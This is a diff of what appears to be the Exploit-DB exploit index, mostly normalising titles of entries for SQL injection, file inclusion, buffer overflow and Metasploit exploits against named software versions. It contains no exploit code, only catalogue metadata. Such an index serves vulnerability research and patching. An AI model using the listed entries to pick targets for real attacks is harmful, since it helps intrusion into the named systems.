@@ id,file,description,date,author,platform,type,port 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos,0 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 - 'index.php' SQL Injection",2005-11-30,r0t,php,webapps,0 -26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps,0 +26668,platforms/php/webapps/26668.txt,"PHP Photo Album 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps,0 26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - buyoffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - products.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 @@ -23915,7 +23915,7 @@ id,file,description,date,author,platform,type,port 26733,platforms/windows/dos/26733.py,"Jolix Media Player 1.1.0 - '.m3u' Denial of Service",2013-07-10,IndonesiaGokilTeam,windows,dos,0 26734,platforms/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 26735,platforms/php/webapps/26735.txt,"vBulletin vBShout Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 -26736,platforms/hardware/webapps/26736.txt,"Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0 +26736,platforms/hardware/webapps/26736.txt,"Zoom Telephonics X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0 26737,platforms/linux/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 27634,platforms/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,php,webapps,0 @@ -24063,7 +24063,7 @@ id,file,description,date,author,platform,type,port 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0 26887,platforms/linux/dos/26887.rb,"rpcbind - (CALLIT procedure) UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 26888,platforms/ios/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent Cross-Site Scripting",2013-07-16,Vulnerability-Lab,ios,webapps,0 -26889,platforms/windows/local/26889.pl,"BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0 +26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0 26890,platforms/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,ios,webapps,0 26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 @@ -24108,7 +24108,7 @@ id,file,description,date,author,platform,type,port 26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - cat.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - links.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0 -40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 +40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - pmprojects.asp projectid Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 @@ -24460,7 +24460,7 @@ id,file,description,date,author,platform,type,port 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 -27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 +27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 @@ -24869,7 +24869,7 @@ id,file,description,date,author,platform,type,port 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter Cross-Site Scripting",2006-06-05,Luny,php,webapps,0 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php' catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 -27703,platforms/windows/remote/27703.py,"PCMAN FTP 2.07 - STOR Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 +27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - STOR Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 27704,platforms/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java - storeImageArray() Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 @@ -25006,7 +25006,7 @@ id,file,description,date,author,platform,type,port 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - showthread.php SQL Injection",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - Moreinfo.asp Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 -27846,platforms/asp/webapps/27846.txt,"EImagePro - - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 +27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 33405,platforms/multiple/remote/33405.txt,"APC Network Management Card - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-15,"Jamal Pecou",multiple,remote,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 @@ -25016,7 +25016,7 @@ id,file,description,date,author,platform,type,port 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 -27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - Vname Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 +27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 - chat.php Cross-Site Scripting",2006-05-12,Mr-X,php,webapps,0 27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 @@ -25216,10 +25216,10 @@ id,file,description,date,author,platform,type,port 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28092,platforms/php/webapps/28092.txt,"MyBulletinBoard 1.0.x/1.1.x - usercp.php SQL Injection",2006-06-22,imei,php,webapps,0 -28093,platforms/php/webapps/28093.txt,"SoftBiz Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 -28094,platforms/php/webapps/28094.txt,"SoftBiz Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 -28095,platforms/php/webapps/28095.txt,"SoftBiz Dating Script 1.0 - 'index.php' cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 -28096,platforms/php/webapps/28096.txt,"SoftBiz Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos,0 @@ -25439,16 +25439,16 @@ id,file,description,date,author,platform,type,port 28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 28324,platforms/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 -28325,platforms/php/webapps/28325.txt,"OZJournals 1.5 - Multiple Input Validation Vulnerabilities",2006-08-02,Luny,php,webapps,0 +40639,platforms/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service",2016-10-27,n30m1nd,windows,dos,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0 28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0 -28328,platforms/windows/remote/28328.rb,"PCMAN FTP 2.07 - STOR Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 +28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - STOR Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28331,platforms/windows/remote/28331.txt,"Oracle Java - ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Privilege Escalation (Metasploit)",2013-09-17,Metasploit,linux,local,0 28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution (Metasploit)",2013-09-17,Metasploit,unix,remote,49152 -28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution (Metasploit)",2013-09-17,Metasploit,linux,remote,443 +28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance - 'sblistpack' Arbitrary Command Execution (Metasploit)",2013-09-17,Metasploit,linux,remote,443 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security - Privilege Escalation (Metasploit)",2013-09-17,Metasploit,windows,local,0 28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,windows,remote,443 28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,windows,remote,443 @@ -25475,7 +25475,7 @@ id,file,description,date,author,platform,type,port 28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 28359,platforms/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 -28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - '.HES' Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 +28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - '.HES' Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 @@ -25575,7 +25575,7 @@ id,file,description,date,author,platform,type,port 28452,platforms/php/webapps/28452.txt,"WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 28453,platforms/php/webapps/28453.txt,"EZContents 2.0.3 - event_list.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28454,platforms/php/webapps/28454.txt,"EZContents 2.0.3 - calendar.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28455,platforms/php/webapps/28455.txt,"EZContents 2.0. - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28455,platforms/php/webapps/28455.txt,"EZContents 2.0 - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28456,platforms/php/webapps/28456.txt,"EZContents 2.0.3 - showguestbook.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28457,platforms/php/webapps/28457.txt,"EZContents 2.0.3 - showlinks.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28458,platforms/php/webapps/28458.txt,"EZContents 2.0.3 - shownews.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 @@ -25886,7 +25886,7 @@ id,file,description,date,author,platform,type,port 28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - sql.php Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 - Addnews.php Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0 -28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - KML/KMZ Files Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 +28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 28788,platforms/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 @@ -26189,7 +26189,7 @@ id,file,description,date,author,platform,type,port 29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 -29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp ProductID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29083,platforms/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",windows,remote,0 29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - default.asp page Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 @@ -26360,7 +26360,7 @@ id,file,description,date,author,platform,type,port 29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - form.php Multiple Parameter Cross-Site Scripting",2006-12-14,Mr_KaLiMaN,php,webapps,0 29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - mod/forum/discuss.php navtail Parameter Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 -29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0 +29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0 29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - explorer.exe WMV File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 @@ -26620,7 +26620,7 @@ id,file,description,date,author,platform,type,port 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 - Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 -30014,platforms/windows/local/30014.py,"Microsoft Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 +30014,platforms/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 @@ -26834,7 +26834,7 @@ id,file,description,date,author,platform,type,port 29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 -29721,platforms/windows/dos/29721.pl,"Fish - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 +29721,platforms/windows/dos/29721.pl,"FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x - Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,linux,dos,0 @@ -26851,7 +26851,7 @@ id,file,description,date,author,platform,type,port 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,hardware,remote,0 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - ADODB-Connection.Inc.php Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 -29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - 'WinMM.dll' .WAV Files Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos,0 +29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos,0 29739,platforms/linux/remote/29739.txt,"Apache Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 @@ -26964,7 +26964,7 @@ id,file,description,date,author,platform,type,port 30175,platforms/php/webapps/30175.txt,"bbPress 0.8.1 - BB-login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0 30177,platforms/php/webapps/30177.txt,"PlaySms 0.9.9.2 - Cross-Site Request Forgery",2013-12-10,"Saadi Siddiqui",php,webapps,0 -30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart - comersus_message.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 +30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 - comersus_message.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 - forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter Cross-Site Scripting",2007-06-20,"Ivan Almuina",cfm,webapps,0 30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free (Metasploit)",2013-12-17,Metasploit,windows,remote,0 30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.cfm SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps,0 @@ -27024,7 +27024,7 @@ id,file,description,date,author,platform,type,port 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 -29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 +29853,platforms/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers - Cas.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,Metasploit,windows,remote,0 @@ -27277,7 +27277,7 @@ id,file,description,date,author,platform,type,port 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do Operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - admin/DeviceAssociation.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 -30278,platforms/windows/remote/30278.c,"SAP DB 7.x - Web Server WAHTTP.exe Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 +30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - Parameters Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 